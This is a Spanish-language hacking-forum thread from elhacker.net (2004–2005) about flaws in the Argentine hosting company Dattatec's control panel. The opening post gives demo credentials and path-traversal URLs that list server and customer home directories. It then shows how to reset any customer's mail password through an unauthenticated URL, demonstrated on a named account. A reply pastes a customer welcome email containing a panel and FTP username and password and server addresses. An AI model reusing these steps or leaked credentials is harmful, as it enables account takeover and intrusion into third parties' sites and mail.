elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 09:32  


Tema destacado: Únete al Grupo Steam elhacker.NET

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Dattatec (hosting) sql inyection
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Dattatec (hosting) sql inyection  (Leído 5,625 veces)
int21h

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Dattatec (hosting) sql inyection
« en: 26 Diciembre 2004, 06:19 »

Fallo en la empresa de hosting Dattatec:
Sabemos que esta empresa aloja mas de 2000 webs muchas mas el fallo consta en el demo de Cpanel en esta direecion:

http://dpanel.dattatec.com:2082
user: dpdemo
pass: dpdemo
A simple vista no parece haber nada raro pero incluyendo unas lineas podemos ejecutar una consulta en el server el cual nos mostrara que hay dentro de el, incluyendo poder acceder a los directorios:

Xpl:

http://dpanel.dattatec.com:2082/indexman/index.php?show_folder=../../

en el cual podemos ver claramente el contenidod el server:
 .. (..) 
 bin 
 boot 
 dev 
 etc 
 home 
 initrd 
 lib 
 lost+found 
 mail 
 mnt 
 opt 
 proc 
 root 
 sbin 
 scripts 
 tmp 
 usr 
 var 

ok, ahora para poder acceder a cada uno de ello es importante hacer click SOBRE EL ICONO DE LA CARPETA NO sobre el nombre asi podemo ver lo que se encuentra en el.

Accediendo al directorio HOME, hacemos click en el icono del dir Home y entramos en el
http://dpanel.dattatec.com:2082/indexman/index.php?show_folder=../../home:

 .. (../..) 
 a1boxco 
 abarly 
 acivgg 
 adictos 
 admin 
 bla bla bla

ok ese es el fallo en cuestion solo por ahora se ´pueden ver unicamente los directorios estamos trabajando para poder acceder a los ficheros, no es un gran fallo si no seria que combinado con otro es fatal:

Cambiando password de los mails de los admins de las webs:

el fallo seria de esta manera:

http://dpanel.dattatec.com:2082/mail/password.php?accntname=USUARIO&domain=DOMINIO

ok facil pero ahora.. ¿como #!$# sabemos el dominio?

facil vamos al primer fallo ingresamos al dir /home y elegimos cualqueir user una vez dentro (siempre pulsando sobre el icono de la carpeta) vemos esto:

 .trash 
 etc 
 mail 
 public_html 
 tmp 

Ahora ingresamos al directorio MAIL y una vez dentro podemos ver que nos dice claramente el nombre del dominio  ahora nos queda unicamente cambiar el passwd de esta manera:

http://dpanel.dattatec.com:2082/mail/password.php?accntname=a1boxco&domain=1box.com.ar

Es un ejemplo nadie se sienta ofendido por las webs

Cambiar contraseña de una cuenta de mail 

Cambiando la contraseña de la cuenta a1boxco@1box.com.ar 
Nueva contraseña:

pulsamos cambiar y .. listo!:
 
La contraseña de la cuenta a1boxco@1box.com.ar ha sido cambiada exitosamente.
 
En breve mas noticias sobre como ver files..

Security .Net Information (snilabs)
snilabs@gmail.com
En línea
jackdaniels

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: Dattatec (hosting) sql inyection
« Respuesta #1 en: 26 Diciembre 2004, 08:46 »

=)

Security .Net Information.-

Atte...
-sh-2.05# exit
-bash-2.05$ exit
Connection closed by foreign host.

En línea

Atte...
-sh-2.05# exit
-bash-2.05$ exit
Connection closed by foreign host.
erdosaim

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: Dattatec (hosting) sql inyection
« Respuesta #2 en: 10 Febrero 2005, 00:58 »

Hola que tal lei tu articulo de dattatec realmentees bueno esto lo que en contre esto  espero que te ayude

1 dattatec todos los miercoles da seminarios online Argentina 5 p.m. Bolivia 4 p.m. Chile 4 p.m. Colombia 3 p.m. España 9 p.m. Mexico 3 p.m. Peru 3 p.m. Uruguay 5 p.m. Venezuela 4 p.m. Rep. Dominicana 4 p.m.

http://conf.dattatec.com

-------------------------------------------------------------------------------------------------

2 estos todos los email que recopile de unos usuarios medios dormilones

***************** IMPORTANTE *****************



Estimado sr



Bienvenido a los servicios de Dattatec.com, gracias por confiar en nosotros.



Recuerde que las consultas técnicas debe canalizarlas por medio de su Mesa de Soporte a través de: http://www.dattatec.com/soporte utilizando el Nombre de Usuario y Contraseña elegidos en el Formulario de Compra.







***************** Instrucciones de Uso de su Servicio ******************



Si es la primera vez que utiliza un servicio de Dattatec.com o desea

acceder a instrucciones detalladas del uso de su Plan o Servicio,

ingrese a Mesa de Soporte a través de: http://www.dattatec.com/soporte

utilizando el Nombre de Usuario y Contraseña elegidos en el Formulario

de Compra. Una vez allí haga click en el link "Manual Uso de Hosting"

También puede observar los tutoriales que se encuentran en la sección

Soporte de nuestro sitio. http://www.dattatec.com/?home=tutoriales



*********************** Datos de su nueva cuenta ***********************





--------------------------------------------------------------------------------------------------



** Visualización de su sitio:



Website URL: http:/nombre de la pagina



acceso temporal si aún su dominio no está direccionado a los NS provistos.



http://200.58.112.128/~tl000215/





IMPORTANTE: Recuerde que el Periodo de Dispersión de Asignación

de NS se estima entre 24 y 72 Hs.



--------------------------------------------------------------------------------------------------





** Datos y NS para asignar a su Nombre de dominio:





Si usted tiene un nombre de dominio necesita proceder a el cambio de ns

por favor cambie los Dominios de nombre de servidor a los siguientes:





Servidor Primario:



69.10.154.2

ns21.dattatec.com





Servidor Secundario:



200.58.112.152

ns22.dattatec.com



.-Datos para Nic.ar-.



Entidad Administradora: Dattatec.com

Contacto tecnico: Guillermo Tornatore





DNS ANONIMOS



Si usted revende Hosting, y desea dns anonimos debe utilizar los siguientes:



Servidor Primario:

69.11.155.4

ns3.hostmar.com



Servidor Secundario:

200.58.142.161

ns4.hostmar.com



.-Datos para Nic.ar-.



Entidad Administradora: Daniela Romero

Contacto tecnico: Daniela Romero



--------------------------------------------------------------------------------------------------





** Acceso a su Panel de Control:



Para conectarse a su PANEL DE CONTROL por favor utilice la siguiente direccion:



http://nombre de la pagina /dattapanel/



(Esta forma de ingresar estara operativa en el momento en que se delegen

los ns de su dominio a nuestros servers)



Acceso temporal si aún no estan asignados sus NS



http://IP/dattapanel



Usuario : cuantos3698nesecita

Password : todos3096somos





** Acceso FTP (para subir su sitio al servidor)



Usted puede comenzar a cargar sus archivos desde:



FTP Host Address : 200.58.112.151



(cuando su dominio se encuentre delegado podra hacerlo desde: ftp.nombre de la pagina com.ar)



Usuario : cuantos3698nesecita

Password : todos3096somos



NOTA IMPORTANTE: Una vez que accedio a la cuenta, debera subir los

archivos de su sitio dentro del directorio public_html.







Configuracion de Correo





Servidor de correo entrante : mail.nombre de pagina


Servidor de correo saliente: mail.igual



Usuario: debe incluir la cuenta completa Ej: nombre@no tengo la mejor idea .com.ar



(tenga en cuenta que no funcionara hasta que su dominio se encuentre delegado)



Recuerde al configurar sus dominios via POP3 realizar la autenticacion del servidor SMTP desde:



Herramientas ---> Cuentas ---> Propiedades



Opcion ---> Servidores---> click en: Mi servidor requiere autenticacion.



Encontrara estos pasos detallados graficamente en nuestra sección Tutoriales.





Como configurar para leer sus correos via Web Mail



Para poder leer sus correos via Web Mail o sea:



http://pagina/webmail



Usted debe configurarlo desde su Dpanel:



Ingrese a:



http:// pagina /dpanel/



Usuario :

Password :



Luego ir a:



Site Management > Redirects



Cuando ingreso colocar luego de http:// pagina .com.ar/



por ejemplo mimail



Y en el otro lado de la flecha luego de http:// colocar :

www.hotmail.com.ar:2084/horde/imp/login.php?autologin=1





Luego:



Donde dice Temporary poner Permanent y luego Click Add

(Hasta que su dominio responda a los nuevos NS)



Entonces ya puede leer sus cuentas de correo via Webmail

ej

http://www.hotmail.com.ar/mimail



Usuario: Direccion completa de su cuenta de correo



Password: Contraseña de su cuenta de correo







--------------------------------------------------------------------------------------------------







** Finalmente, recuerde que puede acceder a información más detallada

sobre el uso del servicio que Ud. adquirió, ingresando a Mesa

de Soporte a través de http://www.dattatec.com/soporte y haciendo

click en el link "Manual Uso de Hosting".

Allí encontrará instrucciones acerca de como configurar cuentas

de correo, webmail, FTP, etc...



Estimado
Para lograr que su sitio web sea visible en Internet, debe acceder a su espacio de web hosting en nuestros servidores para lo cual le brindamos una cuenta FTP que le permitira ingresar remotamente a todas sus carpetas (sitio web, mail, etc.) donde podra subir archivos tantas veces como necesite, las 24 hs., los 365 dias del año.

       Acceso FTP (para subir su sitio al servidor)
******************************************

Usted puede comenzar a cargar sus archivos desde:

FTP Host Address : ftp. nombre de la pagina (o bien desde el link de acceso
temporal que se determina en el email de alta de asunto "Su cuenta ha sido
activada").

 

Usuario :

Password :


NOTA IMPORTANTE: Una vez que accedio a la cuenta, debera subir los archivos de
su sitio dentro del directorio public_html.

Existen varios medios que puede utilizar para subir su sitio al servidor, dependiendo tambien de la tecnologia utilizada para desarrollar su sitio.

Utilice los siguientes links para acceder a los tutoriales interactivos de Dattatec.com dependiendo de sus necesidades:

*   Configuración del software CUTE FTP (Cliente FTP)

 

*   Subir sus archivos al servidor mediante Dreamweaver

*   Subir sus archivos al servidor mediante FrontPage

 



En línea
Paisterist

Desconectado Desconectado

Mensajes: 97



Ver Perfil WWW
Re: Dattatec (hosting) sql inyection
« Respuesta #3 en: 10 Febrero 2005, 03:28 »

Antes tenían un fallo muy importante que lo descubrió un amigo. En /opt/dattapanel/ guardaban los pass y hasta de podía ver el pass de dhmcontrol en limpio. Así qeu les avisé y parchearon, como voy a hacer con este.

Saludos
En línea


Artículos, exploits, ingeniería inversa, seguridad informática, retos y mucho más.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines